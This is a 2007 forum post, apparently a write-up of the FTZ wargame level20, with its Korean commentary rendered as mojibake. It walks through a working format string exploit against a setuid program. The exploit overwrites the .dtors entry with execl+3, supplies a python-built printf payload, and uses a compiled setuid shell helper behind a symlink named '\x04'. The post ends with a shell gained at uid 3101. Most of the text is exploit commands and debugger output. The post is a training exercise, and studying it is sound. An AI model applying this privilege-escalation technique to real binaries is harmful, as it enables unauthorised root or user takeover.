http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2592 [º¹»ç]
Format string bug¸¦ ÀÌ¿ëÇÏ¿©
.dtors(destructor) ¿µ¿ªÀ» ¶óÀ̺귯¸® ÇÔ¼ö execlÇÔ¼öÀÇ ½ÇÇàÁÖ¼Ò·Î º¯°æÇÏ¿©
½© ½ÇÇàÇϱâ.
-----------------------------------------------------------
[level20@ftz level20]$ ls
attackme hint public_html tmp
[level20@ftz level20]$ cat hint
#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
setreuid(3101,3101);
fgets(bleh,79,stdin);
printf(bleh);
}
[level20@ftz level20]$ cd tmp
[level20@ftz tmp]$ ls
in ppp
[level20@ftz tmp]$ cd in
[level20@ftz in]$ ls
? ???@@??? egg egg.c sh sh.c vul vul.c
[level20@ftz in]$ objdump -s -j .dtors ~/attackme
/home/level20/attackme: file format elf32-i386
Contents of section .dtors:
8049594 ffffffff 00000000 ........
[level20@ftz in]$ ~/attackme
AAAABBBB%8x%8x%8x%8x%8x
AAAABBBB 4f401574604009d5004141414142424242
[level20@ftz in]$
/// À§ÀÇ °á°ú·Î, dtors¿µ¿ªÀÇ ÁÖ¼Ò¿Í, $flagÆ÷¸Ë½ºÆ®¸µÀÇ ±¸Á¶¸¦ °èȹÇÒ¼ö ÀÖ´Ù.
[level20@ftz in]$ gdb -q ~/attackme
(gdb) br main
Breakpoint 1 at 0x80483be
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483be in main ()
(gdb) disass execl
Dump of assembler code for function execl:
0x400d16c0 <execl+0>: push %ebp
0x400d16c1 <execl+1>: mov %esp,%ebp
0x400d16c3 <execl+3>: push %edi
.....
0x16c3=5827
0x400d=16397
5827-8=5819
16397-5827=10570
(python -c 'print "\x98\x95\x04\x08\x9a\x95\x04\x08%5819x%4$n%10570x%5$n"';cat) | ~/attackme
/// À§¿Í°°Àº °ø°Ý Äڵ尡 ¿Ï¼ºµÇ¾ú´Ù.
/// °ø°Ý Äڵ尡 ÇÏ´ÂÀÏÀº, °ø°Ý´ë»ó ÇÁ·Î±×·¥ÀÇ Æ÷¸Ë½ºÆ®¸µ¹ö±×¸¦ ÀÌ¿ëÇؼ,
/// dtors¿µ¿ª¿¡ execlÇÔ¼öÀÇ ÁÖ¼Ò(Á¤È®È÷ execl+3)¸¦ ÀÔ·ÂÇÏ¿©, execlÇÔ¼ö¸¦ ½ÇÇàÇÏ°Ô²û ÇØÁִ°ÍÀÌ´Ù.
/// ÇÏÁö¸¸, execlÀº ÀÎÀÚ°ªÀÌ ÀÖ¾î¾ß ÇÑ´Ù. ´ÙÀ½°ú °°Àº Çü½Ä execl("/bin/sh","/bin/sh",0)
/// ÀÎÀÚ°ªÀÌ ¾øÀ»¶©, execl(0)ÀÌ µÇ¾î¹ö·Á.. dtors¿µ¿ªÀ» ¼öÁ¤ÇÏ¿©, execlÇÔ¼ö¸¦ ½ÇÇàÇÏ°Ô²û ÇÑ ¼ö°í°¡ ¹°°ÅÇ°ÀÌ µÉ°ÍÀÌ´Ù.
/// ´çÀå¿¡, ¿øÇÏ´Â ÀÎÀÚ°ªÀ» ÀÛ¼ºÇϱ⿣ ¾î·Æ´Ù.
/// ±×·¸±â¶§¹®¿¡, dtors¿µ¿ª¿¡ execl+0ÀÇ ÁÖ¼Ò°¡ ¾Æ´Ñ, execl+3ÀÇ ÁÖ¼Ò¸¦ µ¤¾î¾´°ÍÀÌ´Ù.
/// execlÇÔ¼ö´Â, $ebp¸¦ ±âÁØÀ¸·Î ÇÏ¿© ÀÎÀÚ°ªÀ» ÀνÄ(?)ÇÑ´Ù...
/// $ebp+8byte¿¡ ÀúÀåµÈ °ªÀÌ °¡¸£Å°´Â ÁÖ¼Ò°ªÀ» ÀÎÀÚ·Î ¹Þ¾ÆµéÀδÙ.
/// 0x400d16c0 <execl+0>: push %ebp
/// 0x400d16c1 <execl+1>: mov %esp,%ebp
/// À§ µÎÁÙÀÇ ÇÁ·Ñ·Î±×°¡ ½ÇÇàµÇ¸é, %ebp°ªÀÌ ÃʱâȵǹǷÎ.. $ebp+8byteÀÇ °ªÀÌ 0x00000001·Î µÇ¾î¹ö¸°´Ù.
/// ¾ÏÆ°...
[level20@ftz in]$ gdb -q ~/attackme
(gdb) br main
Breakpoint 1 at 0x80483be
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483be in main ()
(gdb) x/16wx 0x08049594
0x8049594 <__DTOR_LIST__>: 0xffffffff 0x00000000 0x00000000 0x080494c4
0x80495a4 <_GLOBAL_OFFSET_TABLE_+4>: 0x40015a38 0x4000bcb0 0x080482ce 0x40038850
0x80495b4 <_GLOBAL_OFFSET_TABLE_+20>: 0x080482ee 0x080482fe 0x00000000 0x40157460
0x80495c4 <completed.1>: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) set *0x08049598=0x400d16c3 /// .dtorsÁÖ¼Ò°ªÀ» execl+3ÀÇ ÁÖ¼Ò·Î µ¤¾î¾´´Ù.
(gdb) br *execl+3
Breakpoint 2 at 0x400d16c3
(gdb) c
Continuing.
aaaa
aaaa
Breakpoint 2, 0x400d16c3 in execl () from /lib/libc.so.6
(gdb) x/16wx $ebp+8
0xbffffab0: 0x401597b8 0x401591c0 0xbffffad8 0x4004d940
0xbffffac0: 0x00000000 0x00000005 0x4004d8db 0x401591c0
0xbffffad0: 0x40015360 0xbffffb24 0xbffffaf8 0x4003891f
0xbffffae0: 0x00000005 0xbffffb24 0xbffffb2c 0x4001582c
(gdb) x/x 0x401597b8
0x401597b8 <initial+24>: 0x00000004
(gdb)
0x401597bc <initial+28>: 0x08048438
(gdb) x/s 0x401597b8
0x401597b8 <initial+24>: "\004"
(gdb) q
The program is running. Exit anyway? (y or n) y
[level20@ftz in]$ cat sh.c
int main()
{
setuid(0);
system("/bin/sh");
}
[level20@ftz in]$ gcc -o sh sh.c
[level20@ftz in]$ ln -s sh `printf "\x04"`
[level20@ftz in]$ (python -c 'print "\x98\x95\x04\x08\x9a\x95\x04\x08%5819x%4$n%10570x%5$n"';cat) | ~/attackme
.........
40157460
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
exit
[level20@ftz in]$
-------------------------------------------------------
-------------------------------------------------------
Âü°í :
.dtors(0x08049598)¿¡
execl+0ÁÖ¼Ò°ª(0x400d16c0)À» µ¤¾î ½èÀ»¶§,
execl ÇÔ¼ö°¡ ÀÎÀÚ·Î ¹Þ¾ÆµéÀÌ´Â $ebp+8ÀÇ °ª È®ÀÎ
[level20@ftz in]$ objdump -s -j .dtors ~/attackme
/home/level20/attackme: file format elf32-i386
Contents of section .dtors:
8049594 ffffffff 00000000 ........
[level20@ftz in]$ gdb -q ~/attackme
(gdb) br main
Breakpoint 1 at 0x80483be
(gdb) r
Starting program: /home/level20/attackme
Breakpoint 1, 0x080483be in main ()
(gdb) set *0x08049598=0x400d16c0
(gdb) br *execl+3
Breakpoint 2 at 0x400d16c3
(gdb) c
Continuing.
aaaa
aaaa
Breakpoint 2, 0x400d16c3 in execl () from /lib/libc.so.6
(gdb) x/16wx $ebp+8
0xbffffaa0: 0x00000001 0x00000000 0xbffffab8 0x080484a6
0xbffffab0: 0x401597b8 0x401591c0 0xbffffad8 0x4004d940
0xbffffac0: 0x00000000 0x00000005 0x4004d8db 0x401591c0
0xbffffad0: 0x40015360 0xbffffb24 0xbffffaf8 0x4003891f
(gdb) x/x 0x00000001
0x1: Cannot access memory at address 0x1
(gdb) x/s 0x00000001
0x1: <Address 0x1 out of bounds>
/// ±×·¸±â¶§¹®¿¡ execl+3ÁÖ¼Ò°ª(0x400d16c3)À¸·Î µ¤¾îÁÖ¾î¾ß ÇÑ´Ù.
-------------------------------------------------
Àǹ®Á¡ :: execl+3ÀÇ ÁÖ¼Ò°ªÀ¸·Î º¯°æÇØ ÁÖ¾úÀ»°æ¿ì¿¡µµ
ÀÎÀÚ·Î ¾µ¸¸ÇÑ °ªÀÌ ¾ø´Ù¸é ¾î¶»°Ô ÇؾßÇÒ±î?
|
Hit : 4121 Date : 2007/11/30 08:59
|